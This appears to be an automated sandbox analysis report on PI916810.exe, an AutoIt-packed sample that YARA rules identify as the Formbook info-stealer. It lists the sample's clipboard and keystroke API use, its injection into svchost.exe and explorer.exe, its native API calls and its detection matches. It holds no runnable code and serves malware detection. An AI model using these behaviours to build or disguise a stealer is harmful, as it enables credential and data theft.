          Source: explorer.exe, 00000003.00000000.2051663367.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4496560634.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000003.00000000.2048880486.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4492745414.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
          Source: explorer.exe, 00000003.00000000.2048880486.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4492745414.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004D425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_004D425A
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004D4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_004D4458
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004D425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_004D425A
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004C0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_004C0219
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004ECDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_004ECDAC

          E-Banking Fraud

          Source: Yara match | File source: 0.2.PI916810.exe.1a00000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.PI916810.exe.1a00000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 0.2.PI916810.exe.1a00000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.PI916810.exe.1a00000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PI916810.exe.1a00000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PI916810.exe.1a00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.PI916810.exe.1a00000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PI916810.exe.1a00000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: PI916810.exe PID: 1856, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 6300, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: WWAHost.exe PID: 616, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\PI916810.exeCode function: This is a third-party compiled AutoIt script.0_2_00463B4C
          Source: PI916810.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: PI916810.exe, 00000000.00000000.2017626388.0000000000515000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_42b3428e-d
          Source: PI916810.exe, 00000000.00000000.2017626388.0000000000515000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_30b3c8b0-e
          Source: PI916810.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a7b7f188-3
          Source: PI916810.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_eac676c2-f
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A320 NtCreateFile | 2_2_0041A320
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A3D0 NtReadFile | 2_2_0041A3D0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A450 NtClose | 2_2_0041A450
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A500 NtAllocateVirtualMemory | 2_2_0041A500
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A31D NtCreateFile | 2_2_0041A31D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A44A NtClose | 2_2_0041A44A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972BF0 NtAllocateVirtualMemory,LdrInitializeThunk | 2_2_03972BF0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972B60 NtClose,LdrInitializeThunk | 2_2_03972B60
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972AD0 NtReadFile,LdrInitializeThunk | 2_2_03972AD0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972F90 NtProtectVirtualMemory,LdrInitializeThunk | 2_2_03972F90
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972FB0 NtResumeThread,LdrInitializeThunk | 2_2_03972FB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972FE0 NtCreateFile,LdrInitializeThunk | 2_2_03972FE0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972F30 NtCreateSection,LdrInitializeThunk | 2_2_03972F30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972E80 NtReadVirtualMemory,LdrInitializeThunk | 2_2_03972E80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972EA0 NtAdjustPrivilegesToken,LdrInitializeThunk | 2_2_03972EA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972DD0 NtDelayExecution,LdrInitializeThunk | 2_2_03972DD0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk | 2_2_03972DF0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972D10 NtMapViewOfSection,LdrInitializeThunk | 2_2_03972D10
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972D30 NtUnmapViewOfSection,LdrInitializeThunk | 2_2_03972D30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972CA0 NtQueryInformationToken,LdrInitializeThunk | 2_2_03972CA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03974340 NtSetContextThread | 2_2_03974340
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03974650 NtSuspendThread | 2_2_03974650
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972B80 NtQueryInformationFile | 2_2_03972B80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972BA0 NtEnumerateValueKey | 2_2_03972BA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972BE0 NtQueryValueKey | 2_2_03972BE0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972AB0 NtWaitForSingleObject | 2_2_03972AB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972AF0 NtWriteFile | 2_2_03972AF0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972FA0 NtQuerySection | 2_2_03972FA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972F60 NtCreateProcessEx | 2_2_03972F60
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972EE0 NtQueueApcThread | 2_2_03972EE0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972E30 NtWriteVirtualMemory | 2_2_03972E30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972DB0 NtEnumerateKey | 2_2_03972DB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972D00 NtSetInformationFile | 2_2_03972D00
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972CC0 NtQueryVirtualMemory | 2_2_03972CC0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972CF0 NtOpenProcess | 2_2_03972CF0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972C00 NtQueryInformationProcess | 2_2_03972C00
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972C70 NtFreeVirtualMemory | 2_2_03972C70
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972C60 NtCreateKey | 2_2_03972C60
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03973090 NtSetValueKey | 2_2_03973090
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03973010 NtOpenDirectoryObject | 2_2_03973010
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039735C0 NtCreateMutant | 2_2_039735C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039739B0 NtGetContextThread | 2_2_039739B0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03973D10 NtOpenProcessToken | 2_2_03973D10
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03973D70 NtOpenThread | 2_2_03973D70
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038AA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose | 2_2_038AA036
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038AA042 NtQueryInformationProcess | 2_2_038AA042
          Source: C:\Windows\explorer.exe | Code function: 3_2_1060B232 NtCreateFile | 3_2_1060B232
          Source: C:\Windows\explorer.exe | Code function: 3_2_1060CE12 NtProtectVirtualMemory | 3_2_1060CE12
          Source: C:\Windows\explorer.exe | Code function: 3_2_1060CE0A NtProtectVirtualMemory | 3_2_1060CE0A
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004C4021: CreateFileW,DeviceIoControl,CloseHandle | 0_2_004C4021
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004B8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock | 0_2_004B8858
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004C545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState | 0_2_004C545F
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_0046E800 | 0_2_0046E800
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_0048DBB5 | 0_2_0048DBB5
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_0046FE40 | 0_2_0046FE40
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004E804A | 0_2_004E804A
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_0046E060 | 0_2_0046E060
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_00474140 | 0_2_00474140
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_00482405 | 0_2_00482405
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_00496522 | 0_2_00496522
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004E0665 | 0_2_004E0665
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_0049267E | 0_2_0049267E
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_00476843 | 0_2_00476843
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_0048283A | 0_2_0048283A
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004989DF | 0_2_004989DF
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_00478A0E | 0_2_00478A0E
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004E0AE2 | 0_2_004E0AE2
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_00496A94 | 0_2_00496A94
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004BEB07 | 0_2_004BEB07
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004C8B13 | 0_2_004C8B13
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_0048CD61 | 0_2_0048CD61
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_00497006 | 0_2_00497006
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_0047710E | 0_2_0047710E
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_00473190 | 0_2_00473190
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_00461287 | 0_2_00461287
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004833C7 | 0_2_004833C7
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_0048F419 | 0_2_0048F419
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004816C4 | 0_2_004816C4
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_00475680 | 0_2_00475680
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004758C0 | 0_2_004758C0
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004878D3 | 0_2_004878D3
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_00481BB8 | 0_2_00481BB8
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_00499D05 | 0_2_00499D05
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_00481FD0 | 0_2_00481FD0
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_0048BFE6 | 0_2_0048BFE6
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_010FECA0 | 0_2_010FECA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401030 | 2_2_00401030
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041D89D | 2_2_0041D89D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041C3F2 | 2_2_0041C3F2
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402D90 | 2_2_00402D90
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00409E4C | 2_2_00409E4C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00409E50 | 2_2_00409E50
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E79D | 2_2_0041E79D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402FB0 | 2_2_00402FB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A003E6 | 2_2_03A003E6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E3F0 | 2_2_0394E3F0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FA352 | 2_2_039FA352
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C02C0 | 2_2_039C02C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 | 2_2_039E0274
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A001AA | 2_2_03A001AA
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F41A2 | 2_2_039F41A2
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F81CC | 2_2_039F81CC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DA118 | 2_2_039DA118
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03930100 | 2_2_03930100
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C8158 | 2_2_039C8158
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D2000 | 2_2_039D2000
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393C7C0 | 2_2_0393C7C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03964750 | 2_2_03964750
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940770 | 2_2_03940770
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395C6E0 | 2_2_0395C6E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A00591 | 2_2_03A00591
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940535 | 2_2_03940535
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EE4F6 | 2_2_039EE4F6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E4420 | 2_2_039E4420
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F2446 | 2_2_039F2446
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F6BD7 | 2_2_039F6BD7
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FAB40 | 2_2_039FAB40
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393EA80 | 2_2_0393EA80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0A9A6 | 2_2_03A0A9A6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039429A0 | 2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03956962 | 2_2_03956962
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039268B8 | 2_2_039268B8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396E8F0 | 2_2_0396E8F0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394A840 | 2_2_0394A840
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03942840 | 2_2_03942840
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BEFA0 | 2_2_039BEFA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03932FC8 | 2_2_03932FC8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394CFE0 | 2_2_0394CFE0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03960F30 | 2_2_03960F30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E2F30 | 2_2_039E2F30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03982F28 | 2_2_03982F28
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B4F40 | 2_2_039B4F40
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03952E90 | 2_2_03952E90
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FCE93 | 2_2_039FCE93
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FEEDB | 2_2_039FEEDB
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393AE0D | 2_2_0393AE0D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FEE26 | 2_2_039FEE26
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940E59 | 2_2_03940E59
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03958DBF | 2_2_03958DBF
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DCD1F | 2_2_039DCD1F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394AD00 | 2_2_0394AD00
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0CB5 | 2_2_039E0CB5
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03930CF2 | 2_2_03930CF2
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940C00 | 2_2_03940C00
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0398739A | 2_2_0398739A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F132D | 2_2_039F132D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392D34C | 2_2_0392D34C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039452A0 | 2_2_039452A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395B2C0 | 2_2_0395B2C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E12ED | 2_2_039E12ED
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394B1B0 | 2_2_0394B1B0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0B16B | 2_2_03A0B16B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392F172 | 2_2_0392F172
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397516C | 2_2_0397516C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EF0CC | 2_2_039EF0CC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039470C0 | 2_2_039470C0
